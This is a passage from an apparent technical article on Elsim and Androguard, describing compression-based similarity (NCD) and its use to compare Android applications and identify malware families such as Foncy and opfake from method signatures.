d@t0t0:~/elsim$ ./tests/test_similarity.py * LZMA Idempotency 0/9 1167 1.82118797 Monotonicity 72/72 13258 9.40736294 Symetry 72/72 17380 9.32561111 Distributivity 504/504 214466 133.67427087 * BZ2 Idempotency 0/9 1947 0.00075889 Monotonicity 72/72 18248 0.00626206 Symetry 72/72 221744 0.00735211 Distributivity 504/504 279944 0.09816098 * ZLIB Idempotency 0/9 1073 0.00033116 Monotonicity 72/72 11850 0.00224590 Symetry 72/72 15348 0.00276113 Distributivity 504/504 190386 0.03468490 * XZ Idempotency 0/9 1900 0.55278206 Monotonicity 72/72 17544 4.41346812 Symetry 72/72 21008 4.35566306 Distributivity 504/504 269864 61.70975709 * VCBLOCKSORT Idempotency 0/9 8129 0.00140786 Monotonicity 72/72 86960 0.01695490 Symetry 10/72 115168 0.02190304 Distributivity 504/504 1414896 0.21149492 * SNAPPY Idempotency 0/9 1153 0.00009203 Monotonicity 72/72 12952 0.00057387 Symetry 72/72 17184 0.00059295 Distributivity 504/504 210952 0.01117182 ########################################################################### Snappy [19] is really fast and respects, as do the others, the four conditions. It is interesting to see that the first property will never be satisfied by the NCD. This happens because in practice it is impossible to obtain those conditions even if we have close results (which is why the algorithm works :). It is possible to execute the similarity library in Elsim to use independently the Kolmogorov complexity and the NCD: ########################################### In [1]: from elsim.similarity import similarity In [2]: s = similarity.SIMILARITY("./elsim/similarity/libsimilarity/libsimilarity.so") // change the type of compressor (bzip2) In [3]: s.set_compress_type( similarity.BZ2_COMPRESS ) // Get the kolmogorov complexity (by using the compressor, so this function // returns the length of the compression In [4]: s.kolmogorov("W00T W00T PHRACK") Out[4]: (52L, 0) // Get the similarity distance between two strings In [5]: s.ncd("W00T W00T PHRACK", "W00T W00T PHRACK") Out[5]: (0.057692307978868484, 0) In [6]: s.ncd("W00T W00T PHRACK", "W00T W00T PHRACK STAFF") Out[6]: (0.17543859779834747, 0) In [7]: s.ncd("W00T W00T PHRACK", "HELLO WORLD") Out[7]: (0.23076923191547394, 0) // As you can see : // - the elements of the first comparison are closer // than the elements of the second comparison // - the elements of the second comparison are closer // than the elements of the third comparison // - the result of the first comparison is not 0, that is why // we don't respect the first property but practically it works // because we are not far from 0 // change the type of compressor (Snappy) In [8]: s.set_compress_type( similarity.SNAPPY_COMPRESS ) In [9]: s.ncd("W00T W00T PHRACK", "W00T W00T PHRACK") Out[9]: (0.6666666865348816, 0) In [10]: s.ncd("W00T W00T PHRACK", "W00T W00T PHRACK STAFF") Out[10]: (0.6818181872367859, 0) In [11]: s.ncd("W00T W00T PHRACK", "HELLO WORLD") Out[11]: (0.7777777910232544, 0) // As you can see, Snappy is very bad with such kind of strings, even if // the algorithm respects the dissimilarities between the comparison. // If we test this compressor with longer strings, and strings of // signatures (3.1), we have better results: In [12]: s.ncd("B[I]B[RF1]B[F0S]B[IF1]B[]B[]B[S]B[SS]B[RF0]B[]B[SP0I]"\ "B[GP1]", "B[I]B[RF1]B[F0S]B[IF1]B[]B[]B[S]B[SS]B[RF0]B[]B[SP0I]B[GP1]") Out[12]: (0.0784313753247261, 0) In [13]: s.ncd("B[I]B[RF1]B[F0S]B[IF1]B[]B[]B[S]B[SS]B[RF0]B[]B[SP0I]"\ "B[GP1]", "B[I]B[RF1]B[F0S]B[IF1]B[]B[]B[S]B[SS]B[RF0]B[]B[SP0I]") Out[13]: (0.11764705926179886, 0) In [14]: s.ncd("B[I]B[RF1]B[F0S]B[IF1]B[]B[]B[S]B[SS]B[RF0]B[]B[SP0I]"\ "B[GP1]", "B[G]B[SGIGF0]B[RP1G]B[SP1I]B[SG]B[SSGP0]B[F1]B[P0SSGR]B[F1]"\ "B[SSSI]B[RF1P0R]B[GSP0RP0P0]B[GI]B[P1]B[I]B[GP1S]") Out[14]: (0.9270833134651184, 0) ########################################### Snappy maybe the fastest algorithm but its rate compression is the worst. However, it is not of particular importance. Why? Because it is not a problem if the properties are respected. Moreover if you want an end value which respects more the idea of similarities, you can still switch to some other compressor, such as ZLIB, LZMA or BZ2. The first thing to do is to describe our "basic" element which will be used for a comparison. An element is composed of: - a string - a hash Oh wait, that's all? Yes, we need to compare strings and not other things. But the strings themselves will highly depend of your similarity problem. For example, if your problem is to compare two binaries, it's a bad idea to compare the listings corresponding to a specific function. You need to find the best way to transform your data into suitable strings, and it's probably the most difficult part. Of course it is not our job in this article:) It is not easy to transform your data to a string and it will be specific to each problem. For example, if your data is a chemical molecule you need probably to use SMILES to convert the structure to an ASCII string [34]. Remember that you can't compare elements that easily, you really need a transformation because the Kolmogorov complexity is not magical. Using it requires the normalization of your data. Finally, the hash is only used to quickly remove the identical elements. The algorithm is the following one: - input: A:set(), B:set() where A and B are sets of elements - output: I:set(), S:set(), N:set(), D:set(), Sk:set() where I: identical elements, S: similar elements, N: new elements, D: deleted elements, Sk: skipped elements - Sk: Skipped elements by using a "filtering" function (helpful if we wish to skip some elements from a set (small size, known element from a library, etc.) - Identify internal identical elements in each set - I: Identify "identical" elements by the intersection of A and B - Get all others elements by removing identical elements - Perform the "NCD" between each element of A and B - S: "Sort" all similarities elements by using a threshold - N,D: Get all new/deleted elements if they are not present in one of the previous sets The following diagram describes this algorithm: |--A--| |--B--| | A1 | | B1 | | A2 | | B2 | | A3 | | B3 | |--An-| |--Bn-| | |---------| | |- --->|FILTERING|<-----| |---------| | | | |--------->|Sk| | | |---------| |----->|IDENTICAL|------>|I| |---------| | | | |---|---use-->|Kolmogorov| |---->|NCD| |---| | | | | |---------|-->|Threshold| |-------->| SORTING | |---------| | | /|\ / | \ / | \ / | \ / | \ / | \ |N|<------------/ | \-------->|D| | |---->|S| Moreover we can calculate a similarity "score" using the number of identical elements and the value of the similar elements. Here is a simple example showing you how it is possible to use the algorithm (elsim_text.py). In this case, it's used to compare two plain text files. We modified the COPYING.LESSER text by changing the order of few paragraphs and removing (or adding) words: ########################################### ds@t0t0:~/elsim$ ./tests/example_text_sim.py -i examples/text/COPYING.LESSER examples/text/COPYING.LESSER.MODIF_REORDER Elements: IDENTICAL: 106 SIMILAR: 2 NEW: 0 DELETED: 0 SKIPPED: 2 --> sentences: 99.783060% of similarities ########################################### As you can see, with a few modifications the two files are maximally similar even if the elements are not at the same place. And if you add some debugging information, you can see the two modified sentences: ########################################### [...] SIMILAR sentences: 138 'This version of the GNU Lesser General Public License incorporates the terms and conditions of version 3 of the GNU General Public License' --> 131 'This version of the GNU General Public License incorporates the terms and conditions of version 3 of the GNU General Public License' 0.105263158679 71 'and the "GNU GPL" refers to version 3 of the GNU General Public License' --> 76 'and the "GNU GPL HOOK" refers to version 3 of the GNU General Public License' 0.129032254219 [...] ########################################### ----[ 2.2 In a set of elements The previous algorithm is interesting in order to compare two elements, but if you have more or if you wish to search for a specific signature in a set of elements, it can be very long. That's why we need to use a clustering algorithm [28] to accelerate it. So, an element will be defined by: - a string (a signature), - a set of float values. The float values are classically features vectors that we will use the set of floats to perform the clustering (and you can use specific weights if you think that some elements of the set are more important than others). For example if you consider that the first float value if more important than the second one for clustering you can add a higher weight. In order to have more complex searches (i.e. if you wish to match multiple elements at the same time or only a specific element and not another, etc.) we will use a signature which will be composed of several elements and a Boolean formula whose purpose is to check if a signature matches. The algorithm is: - Load signatures from the database and elements - Execute a classical clustering [28] algorithm (kmeans [3] for example) to reduce the number of comparisons by using the set of float values - For each cluster, compare the loaded from the database signatures with the elements - If the NCD value is below the threshold and if the Boolean formula is true then we have found a valid signature (so we have a valid match!) |---SIGN---| |---ELEM---| | X1 | | E1 | | X2 | | E2 | | X3 | | E3 | |----Xn----| |----En----| | |----------| | |------->|CLUSTERING|<-------| |----------| | | | | | |->Cn | | | |->Cn-1 | | | | __C1__ |->| X1 | |---|---------->|Kolmogorov| | E1 |------>|NCD| | .. | ^ |---| | | | | | | | |---------->|Threshold| | | | | | | | | | / \ | / \ | / \ | F T | / \ |----------------/ | | | | |--------| | | BF | | |--------| | | | | | / \ | / \ | F T |------------------------/ \ | |-----| | OK | |-----| Simple, no ? :) Here is an example (example_sign.py) which shows you how to load signatures and elements, and check if a signature is present. In the following example, we have two signatures composed of elements and a set of "external" data to test. In the dataset, we have a corresponding signature and a false positive: ########################################### SIGNS = [ [ "Sign1", "a", [ [ 4.4915299415588379, 4.9674844741821289, 4.9468302726745605, 0.0 ], "HELLO WORLDDDDDDDDDDDDDDDDDDDDDDD" ] ], [ "Sign2", "a && b", [ [ 2.0, 3.0, 4.0, 5.0 ], "OOOPS !!!!!!!!" ], [ [ 2.0, 3.0, 4.0, 8.0], "OOOOOOOOPPPPPS !!!" ] ], ] ELEMS = [ [ [ 4.4915299415588379, 4.9674844741821289, 4.9468302726745605, 0.0 ], "HELLO WORLDDDDDDDDDDDDDDDDDDDDDDD" ], [ [ 4.4915299415588379, 4.9674844741821289, 4.9468302726745605, 1.0 ], "FALSE POSITIVE" ], [ [ 2.0, 3.0, 4.0, 5.0 ], "HELLO WORLDDDDDDDDDDDDDDDDDDDDDDD" ], [ [ 2.0, 3.0, 4.0, 5.0 ], "HELLO WORLDDDDDDDDDDDDDDDDDDDDDDD" ], [ [ 2.0, 3.0, 4.0, 5.0 ], "HELLO WORLDDDDDDDDDDDDDDDDDDDDDDD" ], [ [ 2.0, 3.0, 4.0, 5.0 ], "HELLO WORLDDDDDDDDDDDDDDDDDDDDDDD" ], ] ########################################### Each signature is composed of either one or several elements and a Boolean formula ("a" is the first element, "b" is the second element, etc.). By running the example, we can see that one signature is detected. It is displayed along with several statistics (such as the number of clusters, the number of comparisons (1) and the number of comparisons without (18) this algorithm). ########################################### d@t0t0:~/elsim/elsim/elsign$ ./example_sign.py ['Sign1', [0, 1, 0.1875]] [SIGN:3 CLUSTERS:3 CMP_CLUSTERS:2 ELEMENTS:6 CMP_ELEMENTS:1 -> 18 5.555556%] ########################################### If we remove the matching element, we can see that we can't detect a match of the signature anymore, even if we have close entropies (fake values in this case) with a signature (but the string is not the same): ########################################### d@t0t0:~/elsim/elsim/elsign$ ./example_sign.py [None] [SIGN:3 CLUSTERS:2 CMP_CLUSTERS:2 ELEMENTS:5 CMP_ELEMENTS:3 -> 15 20.000000%] ########################################### --[ 3 - Real World: Android Now we can apply our algorithms to a real world problem domain. We have chosen that of Android applications and malware identification. One of the main problems with Android Apps is the plagiarism due to the facilities to modify and spread an application. ----[ 3.1 Similarities between two applications To use our generic algorithm, we must first define what are the "string" and the "hash" properties of an element. So, what is an element in the case of an Android application? We define it as a method or a class. The "string" is the signature of a method and the "hash" is the sequence of instructions. Our signature is based on the grammar described by Silvio Cesare [2]. This grammar is very simple: ######################################################################### Procedure ::= StatementList StatementList ::= Statement | Statement StatementList Statement ::= BasicBlock | Return | Goto | If | Field | Package | String Return ::= 'R' Goto ::= 'G' If ::= 'I' BasicBlock ::= 'B' Field ::= 'F'0 | 'F'1 Package ::= 'P' PackageNew | 'P' PackageCall PackageNew ::= '0' PackageCall ::= '1' PackageName ::= Epsilon | Id String ::= 'S' Number | 'S' Id Number ::= \d+ Id ::= [a-zA-Z]\w+ ######################################################################### For example if we have the following code: mov X, 4 mov Z, 5 add X, Z goto +50 add X, Z goto -100 Then the signature is: B[G]B[G] We do not take into account the different instructions but rather the information about the structure of the method. With an Android method, this gives a more complex signature: Code: [...] call [ meth@ 22 Ljava/lang/String; valueOf ['(I)', 'Ljava/lang/String;'] ] goto 50 Signature: B[P1{Ljava/lang/String; valueOf (I)Ljava/lang/String;}G] We only use the control flow graph (CFG) of the methods along with specific instructions of the CFG such as "if*" or "goto". All the instructions like sparse/packed switch [4] are translated to "goto" instructions without details. We can add information about the packages, and especially about the Android/Java packages. Indeed, it's an important information to include in the signature (e.g.: you must use the sendTextMessage API to send an SMS). In the signature we can also add if a method of a package is called, or if there is the creation of an object, or even if a field is read or written. Of course, it's possible to modify this kind of signature if you want to take into account each instruction of the method. However in our case (and after experimental results) it seems useless since we don't depend on the "nature" of each instruction, but only on higher level information. We can extend this concept by using "predefined" signatures to help us: - 0: information about packages (called/created) and fields, no specific information about string - 1: 0 + but with the size of strings, - 2: 0 + filtering android packages names, - 3: 0 + filtering Java packages names, - 4: 0 + filtering Android/Java packages. If we have different types of signatures, we are then able to change dynamically the signature in case the global structure of a function or the Android packages in the structure are more interesting to us. For example, if we disassemble a particular method using Androguard [1] or smali/baksmali [27], we obtain different signatures: ######################################################################### d@t0t0:~/androguard$ ./androlyze.py -s Androlyze version 1.0 In [1]: a, d, dx = AnalyzeAPK("./examples/android/TestsAndroguard/bin/TestsAndroguard.apk") In [5]: d.CLASS_Ltests_androguard_TestIfs.METHOD_testCFG.pretty_show() METHOD access_flags=public (Ltests/androguard/TestIfs; testCFG,()V) local registers: v0...v7 return:void testCFG-BB@0x0 : 0(0) const/4 v0 , [ #+ 1 ] // {1} 1(2) const/4 v1 , [ #+ 1 ] // {1} 2(4) const/4 v2 , [ #+ 1 ] // {1} 3(6) const/4 v3 , [ #+ 1 ] // {1} [ testCFG-BB@0x8 ] testCFG-BB@0x8 : 4(8) iget-boolean v4 , v7 , [ field@ 14 Ltests/androguard/TestIfs; Z P ] 5(c) if-eqz v4 , [ + 77 ] [ testCFG-BB@0x10 testCFG-BB@0xa6 ] testCFG-BB@0x10 : 6(10) move v1 , v0 7(12) iget-boolean v4 , v7 , [ field@ 15 Ltests/androguard/TestIfs; Z Q ] 8(16) if-eqz v4 , [ + 70 ] [ testCFG-BB@0x1a testCFG-BB@0xa2 ] testCFG-BB@0x1a : 9(1a) const/4 v3 , [ #+ 2 ] // {2} [ testCFG-BB@0x1c ] testCFG-BB@0x1c : 10(1c) add-int/lit8 v2 , v2 , [ #+ 1 ] [ testCFG-BB@0x20 ] testCFG-BB@0x20 : 11(20) sget-object v4 , [ field@ 0 Ljava/lang/System; Ljava/io/PrintStream; out ] 12(24) new-instance v5 , [ type@ 25 Ljava/lang/StringBuilder; ] 13(28) invoke-static v0 , [ meth@ 22 Ljava/lang/String; valueOf ['(I)', 'Ljava/lang/String;'] ] 14(2e) move-result-object v6 15(30) invoke-direct v5 , v6 , [ meth@ 25 Ljava/lang/StringBuilder; ['(Ljava/lang/String;)', 'V'] ] 16(36) const-string v6 , [ string@ 5 ',' ] 17(3a) invoke-virtual v5 , v6 , [ meth@ 31 Ljava/lang/StringBuilder; append ['(Ljava/lang/String;)', 'Ljava/lang/StringBuilder;'] ] 18(40) move-result-object v5 19(42) invoke-virtual v5 , v1 , [ meth@ 28 Ljava/lang/StringBuilder; append ['(I)', 'Ljava/lang/StringBuilder;'] ] 20(48) move-result-object v5 21(4a) const-string v6 , [ string@ 5 ',' ] 22(4e) invoke-virtual v5 , v6 , [ meth@ 31 Ljava/lang/StringBuilder; append ['(Ljava/lang/String;)', 'Ljava/lang/StringBuilder;'] ] 23(54) move-result-object v5 24(56) invoke-virtual v5 , v2 , [ meth@ 28 Ljava/lang/StringBuilder; append ['(I)', 'Ljava/lang/StringBuilder;'] ] 25(5c) move-result-object v5 26(5e) const-string v6 , [ string@ 5 ',' ] 27(62) invoke-virtual v5 , v6 , [ meth@ 31 Ljava/lang/StringBuilder; append ['(Ljava/lang/String;)', 'Ljava/lang/StringBuilder;'] ] 28(68) move-result-object v5 29(6a) invoke-virtual v5 , v3 , [ meth@ 28 Ljava/lang/StringBuilder; append ['(I)', 'Ljava/lang/StringBuilder;'] ] 30(70) move-result-object v5 31(72) invoke-virtual v5 , [ meth@ 32 Ljava/lang/StringBuilder; toString ['()', 'Ljava/lang/String;'] ] 32(78) move-result-object v5 33(7a) invoke-virtual v4 , v5 , [ meth@ 8 Ljava/io/PrintStream; println ['(Ljava/lang/String;)', 'V'] ] [ testCFG-BB@0x80 ] testCFG-BB@0x80 : 34(80) iget-boolean v4 , v7 , [ field@ 16 Ltests/androguard/TestIfs; Z R ] 35(84) if-eqz v4 , [ + 4 ] [ testCFG-BB@0x88 testCFG-BB@0x8c ] testCFG-BB@0x88 : 36(88) add-int/lit8 v3 , v3 , [ #+ 4 ] [ testCFG-BB@0x8c ] testCFG-BB@0x8c : 37(8c) iget-boolean v4 , v7 , [ field@ 17 Ltests/androguard/TestIfs; Z S ] 38(90) if-eqz v4 , [ + -8 ] [ testCFG-BB@0x94 testCFG-BB@0x80 ] testCFG-BB@0x94 : 39(94) add-int/lit8 v0 , v0 , [ #+ 6 ] 40(98) iget-boolean v4 , v7 , [ field@ 18 Ltests/androguard/TestIfs; Z T ] 41(9c) if-eqz v4 , [ + -74 ] [ testCFG-BB@0xa0 testCFG-BB@0x8 ] testCFG-BB@0xa0 : 42(a0) return-void testCFG-BB@0xa2 : 43(a2) const/4 v3 , [ #+ 3 ] // {3} 44(a4) goto [ + -68 ] [ testCFG-BB@0x1c ] testCFG-BB@0xa6 : 45(a6) add-int/lit8 v2 , v2 , [ #+ 2 ] 46(aa) goto [ + -69 ] [ testCFG-BB@0x20 ] ######################################################################### By using the first kind of predefined signature, we can see each basic block with some information. By filtering Java packages we have more information about the behavior of the method: ######################################################################### In [6]: dx.get_method_signature(d.CLASS_Ltests_androguard_TestIfs. METHOD_testCFG, predef_sign = analysis.SIGNATURE_L0_0).get_string() Out[6]: 'B[]B[I]B[I]B[]B[]B[P0P1P1P1P1P1P1P1P1P1P1]B[I]B[]B[I]B[I]B[R] B[G]B[G]' In [9]: dx.get_method_signature(d.CLASS_Ltests_androguard_TestIfs. METHOD_testCFG, predef_sign = analysis.SIGNATURE_L0_3).get_string() Out[9]: 'B[]B[I]B[I]B[]B[]B[P0{Ljava/lang/StringBuilder;}P1 {Ljava/lang/String;valueOf(I)Ljava/lang/String;} P1{Ljava/lang/StringBuilder;(Ljava/lang/String;)V} P1{Ljava/lang/StringBuilder;append(Ljava/lang/String;) Ljava/lang/StringBuilder;} P1{Ljava/lang/StringBuilder;append(I)Ljava/lang/StringBuilder;} P1{Ljava/lang/StringBuilder;append(Ljava/lang/String;) Ljava/lang/StringBuilder;} P1{Ljava/lang/StringBuilder;append(I)Ljava/lang/StringBuilder;} P1{Ljava/lang/StringBuilder;append(Ljava/lang/String;) Ljava/lang/StringBuilder;} P1{Ljava/lang/StringBuilder;append(I)Ljava/lang/StringBuilder;} P1{Ljava/lang/StringBuilder;toString()Ljava/lang/String;} P1{Ljava/io/PrintStream;println(Ljava/lang/String;)V}] B[I]B[]B[I]B[I]B[R]B[G]B[G]' ######################################################################### With SIGNATURE_L0_0 being 0 and SIGNATURE_L0_3 being 3. We can test our signature with a real malware like Foncy [5]: ######################################################################### In [15]: a, d, dx = AnalyzeAPK("./apks/malwares/foncy/6be2988a916cb620c71ff3d8d4dac5db2881c6\ 75dd34a4bb7b238b5899b48600") ######################################################################### In this case, we are more interested in signatures embedding Android packages, Java packages or both: ######################################################################### In [16]: dx.get_method_signature(d.CLASS_Lorg_eapp_MagicSMSActivity. METHOD_onCreate, predef_sign = analysis.SIGNATURE_L0_2).get_string() Out[16]: 'B[P1{Landroid/app/Activity;onCreate(Landroid/os/Bundle;)V}P0 P1{Landroid/os/Environment;getExternalStorageDirectory()Ljava/io/File;}P1 P1P1P1P1P0P0P1P1P1P1P1P1I]B[R]B[P1] B[P1{Landroid/telephony/SmsManager;getDefault() Landroid/telephony/SmsManager;} P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V} P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V} P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V} P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V} P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V} P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V} P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V} P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V} P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V} P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V} P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V} P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V} P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V} P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V} P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V} P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V} P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V} P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V} P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V} P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V}P2 P1{Landroid/widget/Toast;makeText(Landroid/content/Context; Ljava/lang/CharSequence; I)Landroid/widget/Toast;} P1{Landroid/widget/Toast;show()V}G]B[G]' In [17]: dx.get_method_signature(d.CLASS_Lorg_eapp_MagicSMSActivity. METHOD_onCreate, predef_sign = analysis.SIGNATURE_L0_3).get_string() Out[17]: 'B[P1P0{Ljava/lang/StringBuilder;}P1 P1{Ljava/io/File;getAbsolutePath()Ljava/lang/String;} P1{Ljava/lang/String;valueOf(Ljava/lang/Object;)Ljava/lang/String;} P1{Ljava/lang/StringBuilder;(Ljava/lang/String;)V} P1{Ljava/lang/StringBuilder;append(Ljava/lang/String;) Ljava/lang/StringBuilder;} P1{Ljava/lang/StringBuilder;toString()Ljava/lang/String;} P0{Ljava/io/File;} P0{Ljava/lang/StringBuilder;} P1{Ljava/lang/String;valueOf(Ljava/lang/Object;)Ljava/lang/String;} P1{Ljava/lang/StringBuilder;(Ljava/lang/String;)V} P1{Ljava/lang/StringBuilder;append(Ljava/lang/String;) Ljava/lang/StringBuilder;} P1{Ljava/lang/StringBuilder;toString()Ljava/lang/String;} P1{Ljava/io/File;(Ljava/lang/String;)V} P1{Ljava/io/File;exists()Z}I]B[R] B[P1{Ljava/io/File;createNewFile()Z}] B[P1P1P1P1P1P1P1P1P1P1P1P1P1P1P1P1P1P1P1P1P1P2P1P1G]B[G]' In [18]: dx.get_method_signature(d.CLASS_Lorg_eapp_MagicSMSActivity. METHOD_onCreate, predef_sign = analysis.SIGNATURE_L0_4).get_string() Out[18]: 'B[P1{Landroid/app/Activity;onCreate(Landroid/os/Bundle;)V} P0{Ljava/lang/StringBuilder;} P1{Landroid/os/Environment;getExternalStorageDirectory()Ljava/io/File;} P1{Ljava/io/File;getAbsolutePath()Ljava/lang/String;} P1{Ljava/lang/String;valueOf(Ljava/lang/Object;)Ljava/lang/String;} P1{Ljava/lang/StringBuilder;(Ljava/lang/String;)V} P1{Ljava/lang/StringBuilder;append(Ljava/lang/String;) [...] Landroid/app/PendingIntent;)V} [...] B[G]' ######################################################################### It's interesting to see that even if our basic blocks are in a different order, the Kolmogorov complexity is preserved and that we observe an important similarity (TestReorg function). If we reorganize each basic block in the signature we can see that the results are quite the same (so basically the NCD bypasses a basic CFG obfuscation): ######################################################################### d@t0t0:~/elsim$ ./tests/test_similarity.py * LZMA (0.031779661774635315, 0) (0.031779661774635315, 0) (0.04237288236618042, 0) (0.040169134736061096, 0) (0.03983228653669357, 0) (0.03991596773266792, 0) (0.042016807943582535, 0) (0.039256200194358826, 0) (0.04356846585869789, 0) (0.03933747485280037, 0) (0.03719008341431618, 0) (0.043478261679410934, 0) (0.043478261679410934, 0) (0.04025423899292946, 0) (0.04411764815449715, 0) (0.041580040007829666, 0) (0.04149377718567848, 0) (0.03563941270112991, 0) (0.03966597095131874, 0) (0.03563941270112991, 0) (0.04184100404381752, 0) (0.04393305256962776, 0) (0.03974895551800728, 0) (0.03983228653669357, 0) (0.041753653436899185, 0) [....] ######################################################################### The "hash" is the sequence of instructions in each method, and for each instruction we remove the information depending on the compilation (registers, etc.). Having defined the "string" and the "hash" properties in the specific context of Android Apps, we can now test the algorithm on various samples. We use a tool called "androsim.py" which is a simple script based on "Elsim". This tool detects and reports: - the identical methods; - the similar methods; - the deleted methods; - the new methods; - the skipped methods. Moreover, a similarity score (between 0.0 to 100.0) is calculated upon the values of the identical methods (1.0) and the similar methods (in this particular case, we calculate the final values using the BZ2 compressor due to the fact that the return value is more "interesting" for the score). It is more interesting because you will have an understandable value related to the similarity. For the first test we use the "opfake" malware [6]. If we take two samples from the same family, an important value of similarity is revealed: ######################################################################### d@t0t0:~/androguard$ ./androsim.py -i apks/malwares/opfake/\ b79106465173490e07512aa6a182b5da558ad2d4f6fae038101796b534628311 apks/malwares/opfake/\ b906279e8c79a12e5a10feafe5db850024dd75e955e9c2f9f82bbca10e0585a6 Elements: IDENTICAL: 34 SIMILAR: 5 NEW: 0 DELETED: 0 SKIPPED: 0 --> methods: 99.100500% of similarities ######################################################################### These two samples have similar methods and it's possible to have more information by specifying the "-d" option: ######################################################################### SIMILAR methods: Lcom/reg/MainRegActivity; displayFakeProgress ()V 61 --> Lcom/reg/MainRegActivity; displayFakeProgress ()V 61 0.0909090936184 Lcom/reg/MainRegActivity; getNextButton ()Landroid/widget/Button; 40 --> Lcom/reg/MainRegActivity; getNextButton ()Landroid/widget/Button; 40 0.125 Lcom/reg/MainRegActivity; showLinkForm ()V 111 --> Lcom/reg/MainRegActivity; showLinkForm ()V 111 0.183673471212 Lcom/reg/MainRegActivity; showRules ()V 132 --> Lcom/reg/MainRegActivity; showRules ()V 132 0.0731707289815 Lcom/reg/MainRegActivity; setMainScreen ()V 147 --> Lcom/reg/MainRegActivity; setMainScreen ()V 147 0.319148927927 IDENTICAL methods: Lcom/reg/MainRegActivity; PushMsg (Ljava/lang/String; Ljava/lang/String;)V 76 --> Lcom/reg/MainRegActivity; PushMsg (Ljava/lang/String; Ljava/lang/String;)V 76 Lcom/reg/SmsReceiver; setListener (Lcom/reg/SMSAction;)V 3 --> Lcom/reg/SmsReceiver; setListener (Lcom/reg/SMSAction;)V 3 Lcom/reg/MainRegActivity; loadString (I)Ljava/lang/String; 52 --> Lcom/reg/MainRegActivity; loadString (I) Ljava/lang/String; 52 Lcom/reg/MainRegActivity; access$600 ()Ljava/lang/String; 3 --> Lcom/reg/MainRegActivity; access$600 ()Ljava/lang/String; 3 Lcom/reg/ParseXml; getXMLTags (Ljava/lang/String; Ljava/lang/String;)Ljava/util/Vector; 82 --> Lcom/reg/ParseXml; getXMLTags (Ljava/lang/String; Ljava/lang/String;)Ljava/util/Vector; 82 Lcom/reg/ParseXml; getXMLExtra (Ljava/lang/String; Ljava/lang/String;)Ljava/lang/String; 52 --> Lcom/reg/ParseXml; getXMLExtra (Ljava/lang/String; Ljava/lang/String;)Ljava/lang/String; 52 Lcom/reg/MainRegActivity; SaveSuccess ()V 23 --> Lcom/reg/MainRegActivity; SaveSuccess ()V 23 Lcom/reg/SmsReceiver; onReceive (Landroid/content/Context; Landroid/content/Intent;)V 59 --> Lcom/reg/SmsReceiver; onReceive (Landroid/content/Context; Landroid/content/Intent;)V 59 Lcom/reg/ParseXml; getXMLIntElement (Ljava/lang/String; Ljava/lang/String;)I 55 --> Lcom/reg/ParseXml; getXMLIntElement (Ljava/lang/String; Ljava/lang/String;)I 55 Lcom/reg/MainRegActivity; getCountry ()Ljava/lang/String; 13 --> Lcom/reg/MainRegActivity; getCountry ()Ljava/lang/String; 13 Lcom/reg/MainRegActivity$5; onReceive (Landroid/content/Context; Landroid/content/Intent;)V 35 --> Lcom/reg/MainRegActivity$5; onReceive (Landroid/content/Context; Landroid/content/Intent;)V 35 Lcom/reg/MainRegActivity$1; (Lcom/reg/MainRegActivity;)V 6 --> Lcom/reg/MainRegActivity$1; (Lcom/reg/MainRegActivity;)V 6 Lcom/reg/MainRegActivity$S_itm; (Lcom/reg/MainRegActivity;)V 21 --> Lcom/reg/MainRegActivity$S_itm; (Lcom/reg/MainRegActivity;)V 21 [...] NEW methods: DELETED methods: 